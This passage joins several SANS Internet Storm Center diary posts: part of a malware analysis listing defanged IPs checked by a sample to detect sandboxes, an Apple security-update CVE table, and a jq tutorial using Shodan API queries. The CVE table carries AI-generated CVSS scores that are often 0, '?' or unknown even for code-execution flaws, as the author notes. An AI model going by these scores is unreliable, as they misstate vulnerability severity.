NXDOMAIN

SOVAM-AS

RU

0

0

195[.]239[.]51[.]59

NXDOMAIN

SOVAM-AS

RU

0

0

195[.]74[.]76[.]222

r-222[.]76[.]74[.]195[.]ptr[.]avast[.]com

AVAST-AS-DC

CZ

0

0

212[.]119[.]227[.]151

NXDOMAIN

SOVAM-AS

RU

0

0

212[.]119[.]227[.]167

NXDOMAIN

SOVAM-AS

RU

0

0

213[.]33[.]142[.]50

mail[.]areal-hotel[.]ru

SOVAM-AS

RU

0

0

Most of these IP addresses belong to major cloud providers. You can also see that some of them have a non-zero number of attacks/counts (results extracted from our AP[2]). Probably most of them are sandboxes or analysis systems deployed by security companies or researchers? I did a quick nmap scan of them and most do not export any port/service.

In the case above, the IP address verification is not performed to detect if the computers is an interesting host to infect or not (classic scenario: when country "x" would like to attack country "y"). In such scenario, the performed tests will rely on big IP pools used by Internet providers, the keyboard mapping, the OS language, etc...

I will keep this list of IP addresses up-to-date amongst my discovered samples and see if there are big changes.

[1] https://www[.]virustotal[.]com/gui/file/9d4d651095f9e03a0321def2dc47252ed22334664218f3df9e2f3dbbf99cdc1b
[2] https://isc.sans.edu/api/

Xavier Mertens (@xme)
Xameco
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Apple released one of its usual "step" upgrades for its operating systems. This covers iOS, iPadOS, macOS, tvOS and watchOS. The update also includes the vulnerability patched in the last rapid security response update.

Our "ChatGPT CVSS calculator" didn't work well this time. I still left the scores in, but if you see "0", "?" or "unknown,": This means ChatGPT didn't respond with a CVSS score.

iOS 16.6 and iPadOS 16.6 iOS 15.7.8 and iPadOS 15.7.8 macOS Ventura 13.5 macOS Monterey 12.6.8 macOS Big Sur 11.7.9 tvOS 16.6 watchOS 9.6 CVE-2023-38136 [important] ChatGPT-CVSS: 9.8 Apple Neural Engine
The issue was addressed with improved memory handling.
An app may be able to execute arbitrary code with kernel privileges x           x CVE-2023-38580 [important] ChatGPT-CVSS: ?  Apple Neural Engine
The issue was addressed with improved memory handling.
An app may be able to execute arbitrary code with kernel privileges x   x       x CVE-2023-32416 [important] ChatGPT-CVSS: unknown Find My
A logic issue was addressed with improved restrictions.
An app may be able to read sensitive location information x x x x     x CVE-2023-32734 [important] ChatGPT-CVSS: unknown. Kernel
The issue was addressed with improved memory handling.
An app may be able to execute arbitrary code with kernel privileges x   x     x x CVE-2023-32441 [important] ChatGPT-CVSS: 8.8 Kernel
The issue was addressed with improved memory handling.
An app may be able to execute arbitrary code with kernel privileges x x x x x x x CVE-2023-38261 [important] ChatGPT-CVSS: unknown. Kernel
The issue was addressed with improved memory handling.
An app may be able to execute arbitrary code with kernel privileges x   x         CVE-2023-38424 [important] ChatGPT-CVSS: unknown Kernel
The issue was addressed with improved memory handling.
An app may be able to execute arbitrary code with kernel privileges x   x         CVE-2023-38425 [important] ChatGPT-CVSS: 9.8 Kernel
The issue was addressed with improved memory handling.
An app may be able to execute arbitrary code with kernel privileges x   x         CVE-2023-38606 [moderate] ChatGPT-CVSS: unknown. *** EXPLOITED *** Kernel
This issue was addressed with improved state management.
An app may be able to modify sensitive kernel state. Apple is aware of a report that this issue may have been actively exploited against versions of iOS released before iOS 15.7.1. x x x x x x x CVE-2023-32381 [important] ChatGPT-CVSS:  unkown. Kernel
A use-after-free issue was addressed with improved memory management.
An app may be able to execute arbitrary code with kernel privileges x   x x x x x CVE-2023-32433 [important] ChatGPT-CVSS: Unknown. Kernel
A use-after-free issue was addressed with improved memory management.
An app may be able to execute arbitrary code with kernel privileges x x x x x x x CVE-2023-35993 [important] ChatGPT-CVSS: Unknown. Kernel
A use-after-free issue was addressed with improved memory management.
An app may be able to execute arbitrary code with kernel privileges x x x x x x x CVE-2023-38410 [important] ChatGPT-CVSS: 0 Kernel
The issue was addressed with improved checks.
A user may be able to elevate privileges x   x         CVE-2023-38603 [moderate] ChatGPT-CVSS: 0 Kernel
The issue was addressed with improved checks.
A remote user may be able to cause a denial-of-service x   x         CVE-2023-38565 [important] ChatGPT-CVSS: 7.0. libxpc
A path handling issue was addressed with improved validation.
An app may be able to gain root privileges x   x x x   x CVE-2023-38593 [important] ChatGPT-CVSS: 0 libxpc
A logic issue was addressed with improved checks.
An app may be able to cause a denial-of-service x   x x x   x CVE-2023-32437 [important] ChatGPT-CVSS: 0 NSURLSession
The issue was addressed with improvements to the file handling protocol.
An app may be able to break out of its sandbox x             CVE-2023-38572 [moderate] ChatGPT-CVSS: 0 WebKit
The issue was addressed with improved checks.
A website may be able to bypass Same Origin Policy x x x     x x CVE-2023-38594 [critical] ChatGPT-CVSS: unknown. WebKit
The issue was addressed with improved checks.
Processing web content may lead to arbitrary code execution x x x     x x CVE-2023-38595 [critical] ChatGPT-CVSS: 0 WebKit
The issue was addressed with improved checks.
Processing web content may lead to arbitrary code execution x   x     x x CVE-2023-38600 [critical] ChatGPT-CVSS: unknown. WebKit
The issue was addressed with improved checks.
Processing web content may lead to arbitrary code execution x   x     x x CVE-2023-38611 [critical] ChatGPT-CVSS: 8.1 WebKit
The issue was addressed with improved memory handling.
Processing web content may lead to arbitrary code execution x   x     x x CVE-2023-37450 [critical] ChatGPT-CVSS: 8.2 *** EXPLOITED *** WebKit
The issue was addressed with improved checks.
Processing web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited. x   x     x x CVE-2023-38597 [critical] ChatGPT-CVSS: 8.6 WebKit Process Model
The issue was addressed with improved checks.
Processing web content may lead to arbitrary code execution x x x         CVE-2023-38133 [moderate] ChatGPT-CVSS: 0 WebKit Web Inspector
The issue was addressed with improved checks.
Processing web content may disclose sensitive information x x x     x x CVE-2023-23540 [important] ChatGPT-CVSS: unknown  Apple Neural Engine
The issue was addressed with improved memory handling.
An app may be able to execute arbitrary code with kernel privileges   x           CVE-2023-32409 [moderate] ChatGPT-CVSS: 8.8 *** EXPLOITED *** WebKit
The issue was addressed with improved bounds checks.
A remote attacker may be able to break out of Web Content sandbox. Apple is aware of a report that this issue may have been actively exploited.   x           CVE-2023-36862 [moderate] ChatGPT-CVSS: unknown AppleMobileFileIntegrity
A downgrade issue affecting Intel-based Mac computers was addressed with additional code-signing restrictions.
An app may be able to determine a user?s current location     x         CVE-2023-32364 [moderate] ChatGPT-CVSS: 0 AppSandbox
A logic issue was addressed with improved restrictions.
A sandboxed process may be able to circumvent sandbox restrictions     x         CVE-2023-35983 [important] ChatGPT-CVSS: 8.2 Assets
This issue was addressed with improved data protection.
An app may be able to modify protected parts of the file system     x x x     CVE-2023-28319 [moderate] ChatGPT-CVSS: unknown. curl
Multiple issues were addressed by updating curl.
Multiple issues in curl     x x x     CVE-2023-28320 [moderate] ChatGPT-CVSS: 0 curl
Multiple issues were addressed by updating curl.
Multiple issues in curl     x x x     CVE-2023-28321 [moderate] ChatGPT-CVSS: unknown. curl
Multiple issues were addressed by updating curl.
Multiple issues in curl     x x x     CVE-2023-28322 [moderate] ChatGPT-CVSS: unknown. curl
Multiple issues were addressed by updating curl.
Multiple issues in curl     x x x     CVE-2023-32418 [moderate] ChatGPT-CVSS: 4.0 Grapher
The issue was addressed with improved checks.
Processing a file may lead to unexpected app termination or arbitrary code execution     x x x     CVE-2023-36854 [moderate] ChatGPT-CVSS: unknown. Grapher
The issue was addressed with improved checks.
Processing a file may lead to unexpected app termination or arbitrary code execution     x x x     CVE-2023-38258 [important] ChatGPT-CVSS: 0 Model I/O
The issue was addressed with improved checks.
Processing a 3D model may result in disclosure of process memory     x x       CVE-2023-38421 [important] ChatGPT-CVSS: 0 Model I/O
The issue was addressed with improved checks.
Processing a 3D model may result in disclosure of process memory     x x       CVE-2023-2953 [moderate] ChatGPT-CVSS: 0 OpenLDAP
The issue was addressed with improved memory handling.
A remote user may be able to cause a denial-of-service     x x x     CVE-2023-38259 [important] ChatGPT-CVSS: 0 PackageKit
A logic issue was addressed with improved restrictions.
An app may be able to access user-sensitive data     x x x     CVE-2023-38564 [important] ChatGPT-CVSS: 0 PackageKit
The issue was addressed with improved checks.
An app may be able to modify protected parts of the file system     x         CVE-2023-38602 [important] ChatGPT-CVSS: 0 PackageKit
A permissions issue was addressed with additional restrictions.
An app may be able to modify protected parts of the file system     x x x     CVE-2023-32442 [moderate] ChatGPT-CVSS: 0 Shortcuts
An access issue was addressed with improved access restrictions.
A shortcut may be able to modify sensitive Shortcuts app settings     x x       CVE-2023-32443 [moderate] ChatGPT-CVSS: 0 sips
An out-of-bounds read was addressed with improved input validation.
Processing a file may lead to a denial-of-service or potentially disclose memory contents     x x x     CVE-2023-32429 [important] ChatGPT-CVSS: unknown. SystemMigration
The issue was addressed with improved checks.
An app may be able to bypass Privacy preferences     x         CVE-2023-38608 [important] ChatGPT-CVSS: unknown. Voice Memos
The issue was addressed with additional permissions checks.
An app may be able to access user-sensitive data     x        

---
Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
Twitter|

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

So often you'll see folks (me included) use "jq" to take an unformatted JSON mess and turn it into a readable output.  For instance, last thursday we used the Shodan API to dump about 650k of host info like this:
curl -s -k "https://api.shodan.io/shodan/host/%1?key=%shodan-api-key%" | jq

In other words, up to today, I've just used jq as a JSON "prettifier".

At some point (OK, TIL), I finally clued into the fact that that the "q" in "jq" stood for "query"

First, let's simplify things first by making a file that we can play with (see Thursday's diary - https://isc.sans.edu/diary/Shodans+API+For+The+Recon+Win/30050/ - for details on the API call below):

curl -s -k "https://api.shodan.io/shodan/host/45.60.31.34?key=%shodan-api-key%" > isc.txt

Let's use jq to query / extract the "ports" array in the file:

type isc.txt | jq ".ports"
[
  1024,
  8200,
  25,
  8112,
  2082,
  2083,
  2087,
  554,
  14344,
  53,
  12345,
  60001,
  9800,
  587,
  80,
  5201,
.. and so on (123 open ports)

printing these without the carriage returns gets it all on one page, sometimes that's important:

type isc.txt | jq ".ports" --compact-output
[1024,8200,25,8112,2082,2083,2087,554,14344,53,12345,60001,9800,587,80,5201,82,83,14265,9306,8800,7777,7779,31337,631,8834,16010,5269,1177,5800,2222,8880,8888,8889,3268,3269,10443,3790,9080,1234,10134,3299,4848,9001,8443,13579,5900,5901,9998,9999,10000,10001,7443,9000,2345,9002,6443,4911,9009,7474,1337,9530,3389,8001,8009,8010,50000,9443,7001,4443,4444,5985,5986,5007,5009,6000,6001,1400,8060,9600,9090,9091,389,9095,5000,5001,9100,5005,5006,1935,8081,5010,8083,4500,8085,8086,8089,8090,7071,4000,8098,25001,2480,4022,5560,3001,8123,444,8126,6080,4040,8139,465,4567,4064,9191,3050,9200,1521,8181,443]

Let's extract both the subdomains and hostnames? (often these are the same):
type isc.txt | jq ".domains,.hostnames"
[
  "cio.org",
  "ranges.io",
  "cyberaces.org",
  "sans.co",
  "imperva.com",
  "cyberfoundations.org",
  "securingthehuman.org",
  "sans.org",
  "giac.net",
  "sans.edu",
  "giac.org",
  "cybercenters.org"
]
[
  "cio.org",
  "ranges.io",
  "cyberaces.org",
  "sans.co",
  "giac.net",
  "imperva.com",
  "cyberfoundations.org",
  "qms.sans.org",
  "content.sans.org",
  "sans.org",
  "sso.securingthehuman.org",
  "isc.sans.edu",
  "sans.edu",
  "giac.org",
  "cybercenters.org"
]

At some point, you'll find that the IP addresses returned by shodan are typically in decimal.  No problem, convert decimal value to hex, then convert each octet back to digital and stuff the dots in!  Or you can just ask for both the ip and ip_str values:

type isc.txt | jq ".ip,.ip_str"
  758914850,
  "45.60.31.34"

How about just dumping out the keys that you can mess with?

type isc.txt |  jq "keys"
[
  "area_code",
  "asn",
  "city",
  "country_code",
  "country_name",
  "data",
  "domains",
  "hostnames",
  "ip",
  "ip_str",
  "isp",
  "last_update",
  "latitude",
  "longitude",
  "org",
  "os",
  "ports",
  "region_code",
  "tags"
]

There's way more to jq - you can execute scripts, add and delete keys, sort output or do math on the various values.  From the "query" perspective, you can treat your JSON input very much like a SQL database - you can use statements like select, index and join, which should all look very familiar.
You can also write scripts for jq to execute.  The scripts have all the scripty things you'd expect: if/then/else, try/catch boolean operators, regex support, text manipulation operators and so on. 
If you have jq installed, typing "man jq" will give you several pages of possibilties, even "jq --help" will get you started.  Googling "man jq" will give you the same if you don't have it installed yet.

For me, basic queries do the job most days (which is what was discussed above) - if I need more I tend to use other scripting solutions, most days bash, python or powershell.  But (just like most of us do with AWK), I'm just scratching the surface of what jq can do.

If you've done something cool with jq, please share in our comment form!  
 

===============
Rob VandenBrink
rob@coherentsecurity.com

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.